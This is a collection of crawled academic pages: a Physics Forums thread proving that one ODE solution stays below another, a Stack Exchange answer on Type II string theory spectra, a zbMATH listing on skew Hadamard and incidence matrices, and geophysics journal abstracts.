{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8249815106391907, "perplexity": 993.8751934473215}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-47/segments/1510934805881.65/warc/CC-MAIN-20171119234824-20171120014824-00547.warc.gz"}
https://www.physicsforums.com/threads/proving-that-one-solution-always-lies-above-the-other.713993/
# Proving that one solution always lies above the other ## Main Question or Discussion Point Hi all, I'd be very happy if you could help me solve a problem in my research. I need to prove the following: $H'(r) = -y(r) - k H(r)$ k is a constant. y is strictly increasing, but not continuous. Let $(a,b]\subset R$. $(H_x, y_x)$ denotes solution x. $H_1(a)<H_0(a)<0$. $H_0(s)<0, H_1(s)<0$ for all $s\in(a,b]$. $y_1(s)>y_0(s)$ for all $s \in (a,b]$. Show: $H_1(r)<H_0(r)$ for all $r \in (a,b]$. Related Differential Equations News on Phys.org pasmith Homework Helper Hi all, I'd be very happy if you could help me solve a problem in my research. I need to prove the following: $H'(r) = -y(r) - k H(r)$ k is a constant. y is strictly increasing, but not continuous. Let $(a,b]\subset R$. $(H_x, y_x)$ denotes solution x. $H_1(a)<H_0(a)<0$. $H_0(s)<0, H_1(s)<0$ for all $s\in(a,b]$. $y_1(s)>y_0(s)$ for all $s \in (a,b]$. Show: $H_1(r)<H_0(r)$ for all $r \in (a,b]$. Starting from $$H_0' + kH_0 = - y_0 \\ H_1' + kH_1 = -y_1$$ if we subtract the second from the first we obtain $$(H_0 - H_1)' + k(H_0 - H_1) = y_1 - y_0$$ and if we multiply by $e^{kr}$ we find that $$\frac{d}{dr} \left(e^{kr} (H_0 - H_1) \right) = e^{kr}(y_1 - y_0)$$ Now the right hand side is strictly positive for all $r \in (a,b]$, and so $e^{kr}(H_0 - H_1)$ is strictly increasing on $(a,b]$. Since it is initially strictly positive ($H_0(a) > H_1(a)$), it therefore remains strictly positive. It follows that $H_0(r) > H_1(r)$ for all $r \in (a,b]$ as required. Thanks a lot! That was a very elegant explanation :) Now, can I prove the same for: $H'(r)=-y(r)-H(r) k(-H(r))$ , where k is a strictly increasing positive function? Last edited: pasmith Homework Helper Thanks a lot! That was a very elegant explanation :) Now, can I prove the same for: $H'(r)=-y(r)-H(r) k(-H(r))$ , where k is a strictly increasing positive function? Yes, assuming that continuous solutions of the now non-linear ODEs exist on $[a,b]$. Starting from the same point as before, we obtain $$(H_0 - H_1)' + k(-H_0)H_0 - k(-H_1)H_1 = y_1 - y_0$$ Now $k(-H_0)H_0 - k(-H_1)H_1$ is not obviously $\frac{f'(r)}{f(r)}(H_0 - H_1)$ for some strictly positive $f(r)$, so we can't use the previous method. However, we can use a different idea. Suppose there exists $r_0 \in (a,b]$ such that $H_0(r_0) = H_1(r_0)$. It then follows, under the assumptions of the previous problem, that $$(H_0 - H_1)'(r_0) = y_1(r_0) - y_0(r_0) > 0$$ which means that at that point $H_0 - H_1$ is strictly increasing. Thus locally $H_0(r) < H_1(r)$ if $r < r_0$ and $H_0(r) > H_1(r)$ if $r > r_0$. It follows that there exists at most one such $r_0 \in (a,b]$, since once $H_0 > H_1$ the solutions can't intersect again in that interval; if they did then at that point $(H_0 - H_1)'$ would not be strictly positive, which is impossible. Thus if $H_0(a) > H_1(a)$ then again it must follow that $H_0(r) > H_1(r)$ for all $r \in (a,b]$. Last edited: Beautiful solution, once again :) I was wondering, whether the fact that y is not necessarily continuous matters. Can I speak about $(H_0-H_1)'(r_0)$ and $y_0(r_0)-y_1(r_0)$? Or do I need to deal with $(H_0-H_1)'(r\rightarrow r_0^-)$. And then, can I claim $y_0(\rightarrow r_0^-)-y_1(r\rightarrow r_0^-)>0$? I think I can, since $y_0(r_0)-y_1(r_0)>0$ everywhere... But I'm not sure how to write that formally. pasmith Homework Helper Beautiful solution, once again :) I was wondering, whether the fact that y is not necessarily continuous matters. How badly behaved are the functions you are considering? If y is at least piecewise continuous then the above arguments will hold on each subinterval on which y is continuous. I think there also constraints on y in order for H to exist in the first place. pasmith Homework Helper On closer inspection, it appears that if $y_1 - y_0$ and $k$ are not continuous then we can't necessarily show that $H_0 > H_1$. We want to use the sign of $(H_0 - H_1)'$ to show that if $(H_0 - H_1)(r_0) = 0$ then $H_0 - H_1$ is strictly increasing in an open neighborhood of $r_0$. That is enough for us to conclude that if $H_0 - H_1$ is initially strictly positive then it remains strictly positive. More formally, we want to show that there exists $\epsilon > 0$ such that if $|r - r_0| < \epsilon$ then $(H_0 - H_1)'(r) > 0$. Then, by the mean value theorem, $H_0 - H_1$ will be strictly increasing on that interval. It is not necessary for the application of the mean value theorem that $(H_0 - H_1)'$ be continuous. We do however need continuity, or at least suitable limiting behaviour, at $r_0$ in order to show that a suitable $\epsilon > 0$ exists. Now if $(H_0 - H_1)'$ is continuous at $r_0$ then, since it is strictly positive at $r_0$, it follows that such an $\epsilon$ exists. However if $(H_0 - H_1)'$ is not continuous at $r_0$ but $$\lim_{r \to r_0^{+}} (H_0 - H_1)'(r) = \lim_{r \to r_0^{+}} (y_1 - y_0)(r) > 0$$ and $$\lim_{r \to r_0^{-}} (H_0 - H_1)'(r) = \lim_{r \to r_0^{-}} (y_1 - y_0)(r) > 0$$ then that again guarantees the existence of such an $\epsilon$ (I am assuming here that $$\lim_{r \to r_0} (k(-H_0)H_0 - k(-H_1)H_1)(r) = 0$$ and if that is not the case then it is not the case that the limits of $(H_0 - H_1)'$ and $y_1 - y_0$ are equal, and I don't see how to make further progress). But the most that the condition $y_1(r) > y_0(r)$ gives us is that $$\lim_{r \to r_0^{+}} (y_1 - y_0)(r) \geq 0$$ and $$\lim_{r \to r_0^{-}} (y_1 - y_0)(r) \geq 0$$ if those limits actually exist. If one of those limits is zero then it might be that $(H_0 - H_1)'$ approaches zero only through negative values, and if one of those limits doesn't exist then we can't say anything at all. Well, we know that $y_1(r)>y_0(r)$ for all r. If y is defined for all r, isn't it necessarily piecewise continuous? k, at any rate, is continuous. It seems to me that there has to be a neighborhood to the left of $r_0$ in which $y_1(r)-y_0(r)>k(-H_0)H_0-k(-H_1)H_1$... pasmith Homework Helper Well, we know that $y_1(r)>y_0(r)$ for all r. If y is defined for all r, isn't it necessarily piecewise continuous? In general, no. But since y is constrained to be strictly increasing https://www.physicsforums.com/newreply.php?do=newreply&p=4527279 [Broken] that the only discontinuities it can have are jump discontinuities, and there can only be a countable number of them. It follows that the only discontinuities $y_1 - y_0$ can have are jump discontinuities, and there can only be a countable number of them. It also follows that the necessary one-sided limits exist. k, at any rate, is continuous. Excellent; my approach should work. It seems to me that there has to be a neighborhood to the left of $r_0$ in which $y_1(r)-y_0(r)>k(-H_0)H_0-k(-H_1)H_1$... I'm not convinced that this is necessarily the case. Last edited by a moderator:
2020-03-28 21:20:46
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9275541305541992, "perplexity": 181.49446227150958}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585370493120.15/warc/CC-MAIN-20200328194743-20200328224743-00028.warc.gz"}
https://phys.libretexts.org/Courses/University_of_California_Davis/UCD%3A_Physics_9HA__Classical_Mechanics/00%3A_Front_Matter/01%3A_TitlePage
Skip to main content $$\require{cancel}$$ # TitlePage UCD: Physics 9HA – Classical Mechanics • Was this article helpful?
2022-05-16 05:20:12
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7754333019256592, "perplexity": 471.1892070466169}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662509990.19/warc/CC-MAIN-20220516041337-20220516071337-00622.warc.gz"}
http://physics.stackexchange.com/questions/64306/spectra-of-the-type-ii-string-theories
# Spectra of the Type II String theories The spectrum of the Type II string theory (both IIA and IIB) is given by: \begin{array}{*{20}{c}} \hline & {{\text{Sector}}}& & {{\text{Spectrum}}}& & {{\text{Massless Fields}}} & \\ \hline & {{\text{R}} - \operatorname{R} }& & {{{\mathbf{8}}_s} \otimes {{\mathbf{8}}_s}}& & {{C_0},{C_1},{C_2},{C_3}{C_4},...} & \\ \hline & {{\text{NS}} - {\text{NS}}}& & {{{\mathbf{8}}_v} \otimes {{\mathbf{8}}_v}}& & {{g_{\mu \nu }},{F_{\mu \nu }},\Phi ,...} & \\ \hline & {{\text{R}} - {\text{NS}}}& & {{{\mathbf{8}}_s} \otimes {{\mathbf{8}}_v}}& & {{{\Psi '}_\mu },\lambda ',...} & \\ \hline & {{\text{NS}} - {\text{R}}}& & {{{\mathbf{8}}_v} \otimes {{\mathbf{8}}_s}}& & {{\Psi _\mu },\lambda ,...} & \hline \end{array} I know that for the Ramond-Ramond fields, the even ones belong to the Type IIB string theory and the odd ones belong to the Type IIA string theory. But what about the rest? Are they there in both Type II string theories? I think it should be the case, because the choice of the GSO projection is only for the R-R sector. - The NS-NS sector is the same in type IIA and IIB, but the R-NS and NS-R sectors differ. The type IIA theory is non-chiral, so the R-NS and NS-R fields transform in $\mathbf{8}_s \otimes \mathbf{8}_v$ and $\mathbf{8}_v \otimes \mathbf{8}_s'$, where $\mathbf{8}_s$ and $\mathbf{8}_s'$ are the two eight-dimensional spinor representations of $SO(8)$. Type IIB, on the other hand, is a chiral theory where the R-NS and NS-R fields are constructed from the same spinor representation, so $\mathbf{8}_s \otimes \mathbf{8}_v$ and $\mathbf{8}_v \otimes \mathbf{8}_s$. Similarly, the R-R sector of IIA is given by $\mathbf{8}_s \otimes \mathbf{8}_s'$, while in the IIB case it is given by $\mathbf{8}_s \otimes \mathbf{8}_s$.
2015-10-05 01:47:31
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9983442425727844, "perplexity": 160.37691150780023}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-40/segments/1443736676547.12/warc/CC-MAIN-20151001215756-00177-ip-10-137-6-227.ec2.internal.warc.gz"}
https://zbmath.org/?q=ut%3Askew+incidence
Found 215 Documents (Results 1–100) 100 MathJax Full Text: Full Text: Full Text: On two Laplacian matrices for skew gain graphs. (English)Zbl 1468.05164 MSC:  05C50 05C22 05C76 Full Text: Full Text: Full Text: Automorphisms of a Clifford-like parallelism. (English)Zbl 1461.51001 MSC:  51A15 51J15 Full Text: MSC:  51A40 Full Text: Morphisms of skew Hadamard matrices. (English)Zbl 1455.15007 MSC:  15B34 05B20 Full Text: Symmetric matrices whose entries are linear functions. (English. Russian original)Zbl 1454.15023 Comput. Math. Math. Phys. 60, No. 1, 102-108 (2020); translation from Zh. Vychisl. Mat. Mat. Fiz. 60, No. 1, 109-115 (2020). Full Text: Full Text: Full Text: Full Text: The maximum number of columns in supersaturated designs with $$s_{\max}=2$$. (English)Zbl 1429.05025 MSC:  05B15 05B20 62K99 Full Text: Leroy, André (ed.) et al., Rings, modules and codes. Fifth international conference on noncommutative rings and their applications, University of Artois, Lens, France, June 12–15, 2017. Providence, RI: American Mathematical Society (AMS). Contemp. Math. 727, 167-176 (2019). MSC:  16W50 16S36 16N80 Full Text: Full Text: On the Smith normal form of a skew-symmetric D-optimal design of order $$n \equiv 2\pmod 4$$. (English)Zbl 1417.05022 MSC:  05B30 05B20 Full Text: Clifford-like parallelisms. (English)Zbl 1409.51002 MSC:  51A15 51J15 Full Text: Constructions of skew Hadamard difference families. (English)Zbl 1402.05017 MSC:  05B10 05B05 05B20 Full Text: MSC:  05B20 MSC:  05B20 Full Text: Full Text: Hoffman’s coclique bound for normal regular digraphs, and nonsymmetric association schemes. (English)Zbl 1364.05049 Abualrub, Taher (ed.) et al., Mathematics across contemporary sciences. AUS-ICMS, American University of Sharjah, United Arab Emirates, April 2–5, 2015. Cham: Springer (ISBN 978-3-319-46309-4/hbk; 978-3-319-46310-0/ebook). Springer Proceedings in Mathematics & Statistics 190, 137-150 (2017). MSC:  05C62 05B20 05E30 Full Text: On skew E-W matrices. (English)Zbl 1348.05038 MSC:  05B20 15B99 Full Text: Full Text: Full Text: Full Text: Complex spherical codes with two inner products. (English)Zbl 1321.05034 MSC:  05B30 05B20 Full Text: Inner product vectors for skew-Hadamard matrices. (English)Zbl 1329.05045 Colbourn, Charles J. (ed.), Algebraic design theory and Hadamard matrices. ADTHM, Lethbridge, Alberta, Canada, July 8–11, 2014. Selected papers based on the presentations at the workshop and at the workshop on algebraic design theory with Hadamard matrices: applications, current trends and future directions, Banff International Research Station, Alberta, Canada, July 11–13, 2014. Cham: Springer (ISBN 978-3-319-17728-1/hbk; 978-3-319-17729-8/ebook). Springer Proceedings in Mathematics & Statistics 133, 171-187 (2015). MSC:  05B20 15B35 Full Text: On good matrices and skew Hadamard matrices. (English)Zbl 1329.05038 Colbourn, Charles J. (ed.), Algebraic design theory and Hadamard matrices. ADTHM, Lethbridge, Alberta, Canada, July 8–11, 2014. Selected papers based on the presentations at the workshop and at the workshop on algebraic design theory with Hadamard matrices: applications, current trends and future directions, Banff International Research Station, Alberta, Canada, July 11–13, 2014. Cham: Springer (ISBN 978-3-319-17728-1/hbk; 978-3-319-17729-8/ebook). Springer Proceedings in Mathematics & Statistics 133, 13-28 (2015). MSC:  05B20 Full Text: On $$(-1,1)$$-matrices of skew type with the maximal determinant and tournaments. (English)Zbl 1329.05037 Colbourn, Charles J. (ed.), Algebraic design theory and Hadamard matrices. ADTHM, Lethbridge, Alberta, Canada, July 8–11, 2014. Selected papers based on the presentations at the workshop and at the workshop on algebraic design theory with Hadamard matrices: applications, current trends and future directions, Banff International Research Station, Alberta, Canada, July 11–13, 2014. Cham: Springer (ISBN 978-3-319-17728-1/hbk; 978-3-319-17729-8/ebook). Springer Proceedings in Mathematics & Statistics 133, 1-11 (2015). MSC:  05B20 15B34 Full Text: Linear algebra and matrices. Topics for a second course. (English)Zbl 1334.15002 Pure and Applied Undergraduate Texts 24. Providence, RI: American Mathematical Society (AMS) (ISBN 978-1-4704-1852-6/hbk). xv, 317 p. (2015). Full Text: Determinants of $$(-1,1)$$-matrices of the skew-symmetric type: a cocyclic approach. (English)Zbl 1307.05031 MSC:  05B20 15A15 Full Text: Havliček-Tietze configurations in various projective planes. (English)Zbl 1307.51002 MSC:  51A20 51A30 51E15 12F05 12Y05 Full Text: Full Text: Full Text: Full Text: Full Text: The collineations which act as addition and multiplication on points in a certain class of projective Klingenberg planes. (English)Zbl 1284.51006 MSC:  51C05 51J10 12E15 Full Text: The impact of number theory and computer-aided mathematics on solving the Hadamard matrix conjecture. (English)Zbl 1279.05008 Borwein, Jonathan M. (ed.) et al., Number theory and related fields. In memory of Alf van der Poorten. Based on the proceedings of the international number theory conference, Newcastle, Australia, March 12–16, 2012. New York, NY: Springer (ISBN 978-1-4614-6641-3/hbk; 978-1-4614-6642-0/ebook). Springer Proceedings in Mathematics & Statistics 43, 313-320 (2013). MSC:  05B20 11C20 20B20 Full Text: Matrix theory. (English)Zbl 1275.15001 Graduate Studies in Mathematics 147. Providence, RI: American Mathematical Society (AMS) (ISBN 978-0-8218-9491-0/hbk). x, 253 p. (2013). Full Text: Full Text: Difference sets and doubly transitive actions on Hadamard matrices. (English)Zbl 1242.05038 MSC:  05B10 05B20 Full Text: Matrices with restricted entries and $$q$$-analogues of permutations. (English)Zbl 1247.05027 MSC:  05A30 05B20 Full Text: Full Text: MSC:  05B20 Full Text: MSC:  05B20 Full Text: Full Text: Linearly small elation quadrangles. (English)Zbl 1189.51003 MSC:  51E12 51A10 51A50 Full Text: On angles and distances between subspaces. (English)Zbl 1177.15024 MSC:  15A60 15B57 15A18 Full Text: Full Text: Full Text: On constants in the Füredi-Hajnal and the Stanley-Wilf conjecture. (English)Zbl 1193.05005 MSC:  05A05 05B20 15B57 Full Text: Skew Hadamard designs and their codes. (English)Zbl 1179.05024 MSC:  05B20 94B25 Full Text: MSC:  05B20 Full Text: MSC:  05B20 Full Text: On the automorphisms of Paley’s type II Hadamard matrix. (English)Zbl 1189.05037 MSC:  05B20 20B25 15B57 Full Text: MSC:  05B20 62K05 Full Text: Ranks of Hadamard matrices and equivalence of Sylvester-Hadamard and pseudo-noise matrices. (English)Zbl 1136.15016 Ball, Joseph A. (ed.) et al., Recent advances in matrix and operator theory. Proceedings of the 16th international workshop on operator theory and applications, IWOTA, Storrs, CT, USA, 2005. Basel: Birkhäuser (ISBN 978-3-7643-8538-5/hbk). Operator Theory: Advances and Applications 179, 35-46 (2008). Analytical formulas for minors of orthogonal designs and an application. (English)Zbl 1177.65067 Păltineanu, Gavriil (ed.) et al., Trends and challenges in applied mathematics. Conference proceedings of the international conference, ICTCAM 2007, Bucharest, Romania, June 20–23, 2007. Bucharest: Matrix Rom (ISBN 978-973-755-283-9/pbk). 237-240 (2007). Full Text: Spindle-configurations of skew lines. (English)Zbl 1152.51001 MSC:  51A20 05B30 57M25 57Q37 57M27 52C30 55R80 Full Text: MSC:  78A45 Full Text: Determination of all possible orders of weight 16 circulant weighing matrices. (English)Zbl 1218.15019 MSC:  15B57 05B20 Full Text: Circulant weighing matrices of weight $$2^{2t}$$. (English)Zbl 1200.05042 MSC:  05B20 05B10 15B57 Full Text: Full sign pattern matrices that allow idempotency with rank $$k$$. (English)Zbl 1112.15026 MSC:  15B57 15A03 05B20 The number of zeros of a tight sign-central matrix. (English)Zbl 1084.15020 MSC:  15B57 15A06 05B20 Full Text: Construction of new skew Hadamard matrices and their use in screening experiments. (English)Zbl 1429.62350 MSC:  62K15 05B20 Full Text: Determinants of matrices associated with incidence functions on posets. (English)Zbl 1080.11023 MSC:  11C20 15B57 Full Text: Antipodal $$n$$-gons inscribed in a regular $$(2n - 1)$$-gon and half-circulant Hadamard matrices of order $$4n$$. (Russian. English summary)Zbl 1072.05015 MSC:  05B20 15B57 Normal form of skew-symmetric matrices and orders of pseudo-symplectic groups over $$\mathbb Z/2^k\mathbb Z$$. (Chinese. English summary)Zbl 1069.05015 MSC:  05B20 15B57 20G35 Cocyclic function on Jacket matrices. (English)Zbl 1063.65597 MSC:  65T50 15B57 05B20 Full Text: New skew-Hadamard matrices of order $$4\cdot 59$$ and new $$D$$-optimal designs of order $$2\cdot 59$$. (English)Zbl 1054.62081 MSC:  62K05 05B20 Full Text: Line-hyperline pairs of projective spaces and fundamental subgroups of linear groups. (English)Zbl 1046.51001 MSC:  51A05 51D25 12E15 Full Text: About some classes $$VW$$- planes. (Russian)Zbl 1109.51300 MSC:  51A20 12E15 Construction and normality of the Kronecker product of Hadamard matrices. (Chinese. English summary)Zbl 1049.05505 MSC:  05B20 15B57 On embeddability of uniformly valued ternary fields in Hahn ternary fields. (Zur Einbettung uniform bewerteter Ternärkörper in Hahn-Ternärkörper.) (German)Zbl 1054.51001 MSC:  51A25 13F25 12K99 Full Text: Full Text: Full Text: Full Text: On good matrices, skew Hadamard matrices and optimal designs. (English)Zbl 1011.62075 MSC:  62K05 05B20 Full Text: Irreducible powerful ray pattern matrices. (English)Zbl 0994.15026 MSC:  15B57 15B48 05B20 Full Text: The permutations $$123p_4\dots p_m$$ and $$321p_4\dots p_m$$ are Wilf-equivalent. (English)Zbl 0988.05008 MSC:  05A05 05B20 15B57 Full Text: Hankel matrices in combinatorial sequence analysis. (English)Zbl 1002.15023 MSC:  15B57 15A15 05B20 Permutations matrix. (English)Zbl 0970.05004 MSC:  05A05 05B20 15B57 Full Text: all top 5 all top 5 all top 5 all top 3 all top 3
2022-08-11 02:14:10
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5806950330734253, "perplexity": 7302.121974020661}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571232.43/warc/CC-MAIN-20220811012302-20220811042302-00325.warc.gz"}
https://www.x-mol.com/paper/geo/tag/128/journal/71643
• Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-02-13 Xinyou Zhang, Lin Liu, Yajuan Song Abstract The long-term trend and seasonal variability of sea surface temperature (SST) over tropical Indo-Pacific region under the global warming projection simulated by FIO-ESM model are analyzed. At seasonal time scale, significant warming trend over Indo-Pacific area is well captured by FIO-ESM model over the warm pool region under RCP8.5 scenario. The La Niña-like warming pattern is dominant in the tropical Pacific and the negative Indian Ocean Dipole warming pattern takes place in the Indian Ocean in global warming projection separately. The strength of SST warming trend is found to be seasonal dependent over Indo-Pacific region. The spatial distribution of calendar month where fastest/slowest SST warming trend take place in tropical Indo-Pacific has been assessed in FIO-ESM simulation, which is corresponded with the distribution of SST climatology closely in Pacific but not in Indian Ocean. 更新日期:2020-02-13 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-02-13 Vimlesh Pant, Kumar Ravi Prakash Abstract A coupled ocean–atmosphere–wave model was used to assess the impact of model coupling on the simulations of air–sea fluxes, surface currents, waves, and temperature profile during the passage of a tropical cyclone (TC) Phailin in the Bay of Bengal. Four numerical experiments with different coupling configurations among the atmosphere, ocean, and wave models were carried out to identify differences in simulated atmospheric and oceanic parameters. The simulated track and intensity of Phailin agree well with the observations. The inter-comparison of model experiments with different coupling options highlights the importance of better air–sea fluxes in the coupled model as compared to the uncoupled model towards an improvement in the simulation of TC Phailin. The coupled model configurations overcome the cold bias (up to − 2 °C) in sea surface temperature simulated by the uncoupled ocean model. A higher magnitude of the surface drag coefficient in the uncoupled atmosphere model enhanced the bottom stress (> 2 N m−2). As a result of excess momentum transfer to the sea surface, the uncoupled ocean model produced stronger surface currents as compared to the coupled model. The inclusion of the wave model increases the sea surface roughness and, thereby, improves the wind speed and momentum flux at the air–sea interface. The maximum significant wave height in the coupled model was about 2 m lower than the uncoupled wave model. The model experiments demonstrate that the periodic feedback among the atmosphere, ocean, and wave models leads to a better representation of momentum and heat fluxes that improves the prediction of a tropical cyclone. 更新日期:2020-02-13 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-02-13 Yunus Levent Ekinci, Aydin Büyüksaraç, Özcan Bektaş, Can Ertekin Abstract Quaternary Mount Nemrut stratovolcano, having a spectacular summit caldera and associated lakes, is located north of the Bitlis–Zagros suture zone, Eastern Turkey. Although much attention has been paid to its geology, morphology, history and biology, a detailed geophysical investigation has not been performed in this special region. Thus, we attempted to characterize the stratovolcano and the surroundings using total field aeromagnetic anomalies. Potential field data processing techniques helped us to interpret geologic sources causing magnetic signatures. Resulting image maps obtained from some linear transformations and a derivative-based technique revealed general compatibility between the aeromagnetic anomalies and the near-surface geology of the study area. Some high amplitude magnetic anomalies observed north of the Nemrut caldera rim are associated with the latest bimodal volcanic activity marked by lava fountains and comenditic-basaltic flows occurred along the rift zone. After minimizing the high-frequency effects, a pseudogravity-based three-dimensional inversion scheme revealed that the shallowest deep-seated sources are located about 3.0 km below the ground surface. Two-dimensional normalized full gradient solutions also exposed the depths of these anomaly sources, in good agreement with the inversion results. This first geophysical study performed through aeromagnetic anomalies clearly gave insights into some main magnetized structures of the Mount Nemrut stratovolcano. 更新日期:2020-02-13 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-02-13 Luxman Kumar, J. P. Narayan Abstract This paper presents a scenario for the spatial variation of the fundamental frequency of the sediment deposits above the basement and the corresponding amplification as well as the average spectral amplification in different frequency bandwidths for the National Capital Territory Delhi (the capital of India). The exposed central quartzite ridge and the Yamuna River channel are responsible for very large spatial variations of the fundamental frequency in the eastern part of the National Capital Territory Delhi. At 20% of the considered sites, a good match is obtained between the fundamental frequency computed numerically using available S-wave velocities to a certain depth and their extrapolation and that obtained experimentally. The computed fundamental and dominant frequencies reveal that both medium-rise (5–10 storey) and high-rise (> 10 storey) buildings in the western part and medium-rise buildings lying in the localities east of or very near to the Yamuna River may suffer heavy to very heavy damage due to the occurrence of the double resonance phenomenon. Furthermore, 1–2-storey buildings lying on the weathered exposed quartzite rock may also suffer heavy damage during local earthquakes because of the occurrence of double resonance. The possible reasons behind the lack of earthquake damage to the Qutab Minar, the tallest brick masonry minaret in the world, over the last 800 years may be the nonoccurrence of double resonance and almost no amplification in the low frequency range. There are two localities in the western part of the National Capital Territory Delhi, namely Kanganheri-Chhawla and Buradi, wherein all sorts of buildings are highly vulnerable to earthquake damage. For the closed Chhatarpur Basin and a semiclosed basin to its northeast, formed due to exposed quartzite rock, three-dimensional (3D) simulations are required to predict the characteristics of basin-generated surface waves and their focusing effects in the Chhatarpur Basin. The average spectral amplification map developed for the 0–10 Hz bandwidth depicts a range of 2.25–4.82 in the National Capital Territory Delhi and may be directly used to transfer the estimated seismic hazard at basement to the free surface. 更新日期:2020-02-13 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-02-13 Mohamed Salah Boussaid, Céline Mallet, Kévin Beck, Jodry Clara Abstract We study damage induced by low temperature variations in granite samples given their role in shallow geological reservoirs. We consider two thermal treatments, slow cooling and thermal shock, and implement a multi-geophysical approach to characterize the induced micro-scale damage. The methodology consists in monitoring elastic wave velocity and thermal conductivity as well as describing the damage by the way of Hg-porosity measurements and microscopic observations. To discuss the reproducibility of the induced damage, the same thermal protocol is performed on five samples. Our first results indicate that the thermal shock leads to a more pronounced damage. This is interpreted to be due to a larger variety of nucleated intragranular and intergranular cracks as observed by SEM and optic microscope. Yet, this more significant damage does not appear reproducible from one sample to another compared to the damage introduced by slow cooling. According to this first result, thereby, we propose a timely monitoring of elastic wave velocity, conductivity and Hg-porosity. It appears that the damage introduced by the slow cooling, unlike the thermal shock, does not present a long persistence. Indeed, after 15 days, the different properties had returned to their initial state. A time-dependence mechanism is proposed to discuss this observed process. 更新日期:2020-02-13 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2020-02-10 Viacheslav K. Gusiakov Abstract The run-up catalogs of two global tsunami databases maintained by the NCEI/WDC NOAA and NTL/ICMMG SD RAS are examined to compile the list of annual maximum runups observed or measured in the oceanic, marine and inland basins during the last 120 years (from 1900 to 2019). All the retrieved annual maximum runups were divided into four groups according to four main types of tsunami sources (seismogenic, landslide-generated, volcanic, and meteorological). Their distribution over the type of sources shows that of the 120 maximum runups only 78 (65%) resulted from seismogenic sources, while the remaining 42 runups were divided between 